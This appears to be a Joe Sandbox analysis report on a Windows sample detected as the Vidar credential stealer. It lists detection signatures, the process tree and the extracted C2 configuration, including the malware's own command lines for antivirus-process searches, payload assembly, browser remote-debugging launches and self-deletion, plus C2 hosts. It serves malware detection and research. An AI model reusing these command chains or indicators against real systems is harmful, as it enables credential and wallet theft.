Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JA7cOAGHym.exe

Overview

General Information

Sample name:JA7cOAGHym.exe
renamed because original name is a hash value
Original sample name:6e90f0e42285206dce01ffbbd748b081.exe
Analysis ID:1581382
MD5:6e90f0e42285206dce01ffbbd748b081
SHA1:553136becab0e4000f4a47b68d732c2e921cbdc9
SHA256:9b2f6d11a8ffb4d7124fe6ce8ace1672070ee668759900130100d81bc5378dc2
Tags:exeuser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Performs DNS queries to domains with low reputation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • JA7cOAGHym.exe (PID: 5812 cmdline: "C:\Users\user\Desktop\JA7cOAGHym.exe" MD5: 6E90F0E42285206DCE01FFBBD748B081)
    • cmd.exe (PID: 576 cmdline: "C:\Windows\System32\cmd.exe" /c move Brisbane Brisbane.cmd & Brisbane.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 4028 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3716 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5640 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5236 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5612 cmdline: cmd /c md 208079 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7148 cmdline: extrac32 /Y /E Validation MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 3452 cmdline: findstr /V "SAO" Offering MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4204 cmdline: cmd /c copy /b ..\Involve + ..\Iso + ..\Leo + ..\Viewpicture y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Pokemon.com (PID: 6468 cmdline: Pokemon.com y MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 6180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 2504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2320,i,6168099794620049130,9093318800782108175,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • msedge.exe (PID: 2000 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 6664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2756 --field-trial-handle=2520,i,17626979648747034904,9426378667772117242,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • cmd.exe (PID: 7252 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\208079\Pokemon.com" & rd /s /q "C:\ProgramData\79RQ1VS0ZU3E" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 3032 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 348 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 1096 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4028 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2860 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3360 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6896 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6400 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000C.00000003.2439280630.0000000004234000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 10 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              12.2.Pokemon.com.4230000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                12.2.Pokemon.com.4230000.1.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
                • 0x2068c:$str01: MachineID:
                • 0x1f051:$str02: Work Dir: In memory
                • 0x206c3:$str03: [Hardware]
                • 0x20675:$str04: VideoCard:
                • 0x1fce5:$str05: [Processes]
                • 0x1fcf1:$str06: [Software]
                • 0x1f1bb:$str07: information.txt
                • 0x20398:$str08: %s\*
                • 0x203e5:$str08: %s\*
                • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                • 0x1fb61:$str12: UseMasterPassword
                • 0x206cf:$str13: Soft: WinSCP
                • 0x2016e:$str14: <Pass encoding="base64">
                • 0x206b2:$str15: Soft: FileZilla
                • 0x1f1ad:$str16: passwords.txt
                • 0x1fb8c:$str17: build_id
                • 0x1fc80:$str18: file_data

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Browser Started with Remote Debugging
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Pokemon.com y, ParentImage: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com, ParentProcessId: 6468, ParentProcessName: Pokemon.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 6180, ProcessName: chrome.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Sigma detected: Search for Antivirus process
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Brisbane Brisbane.cmd & Brisbane.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 576, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5236, ProcessName: findstr.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T14:46:51.853531+010020442471Malware Command and Control Activity Detected116.203.8.178443192.168.2.549784TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T14:46:54.194581+010020518311Malware Command and Control Activity Detected116.203.8.178443192.168.2.549790TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T14:46:49.516195+010020490871A Network Trojan was detected192.168.2.549778116.203.8.178443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T14:46:47.093401+010028593781Malware Command and Control Activity Detected192.168.2.549772116.203.8.178443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Multi AV Scanner detection for submitted file
                Source: JA7cOAGHym.exeVirustotal: Detection: 40%Perma Link
                Source: JA7cOAGHym.exeReversingLabs: Detection: 28%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.2% probability
                Source: JA7cOAGHym.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:50015 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 116.203.8.178:443 -> 192.168.2.5:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 116.203.8.178:443 -> 192.168.2.5:50001 version: TLS 1.2
                Source: JA7cOAGHym.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_000FDC54
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0010A087
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0010A1E2
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_000FE472
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_0010A570
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000CC622 FindFirstFileExW,12_2_000CC622
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_001066DC FindFirstFileW,FindNextFileW,FindClose,12_2_001066DC
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_00107333 FindFirstFileW,FindClose,12_2_00107333
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_001073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_001073D4
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_000FD921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\208079Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\208079\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: chrome.exeMemory has grown: Private usage: 9MB later: 39MB

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49778 -> 116.203.8.178:443
                Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49772 -> 116.203.8.178:443
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.8.178:443 -> 192.168.2.5:49784
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.8.178:443 -> 192.168.2.5:49790
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                Performs DNS queries to domains with low reputation
                Source: DNS query: fa5lt.xyz
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 20.189.173.1 20.189.173.1
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:50015 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
                Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
                Source: unknownTCP traffic detected without corresponding DNS query: 104.18.20.226
                Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
                Source: unknownTCP traffic detected without corresponding DNS query: 104.18.20.226
                Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.143
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.143
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.143
                Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.145
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.145
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.145
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.92
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.92
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.92
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.143
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.143
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.143
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.143
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.143
                Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.145
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.145
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.145
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.145
                Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.145
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.92
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.92
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.92
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.92
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.92
                Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010D889 InternetReadFile,SetEvent,GetLastError,SetEvent,12_2_0010D889
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: fa5lt.xyzConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735307249044&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b651b00d73bb4a9ab8b6ca7210063a71&activityId=b651b00d73bb4a9ab8b6ca7210063a71&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /b?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
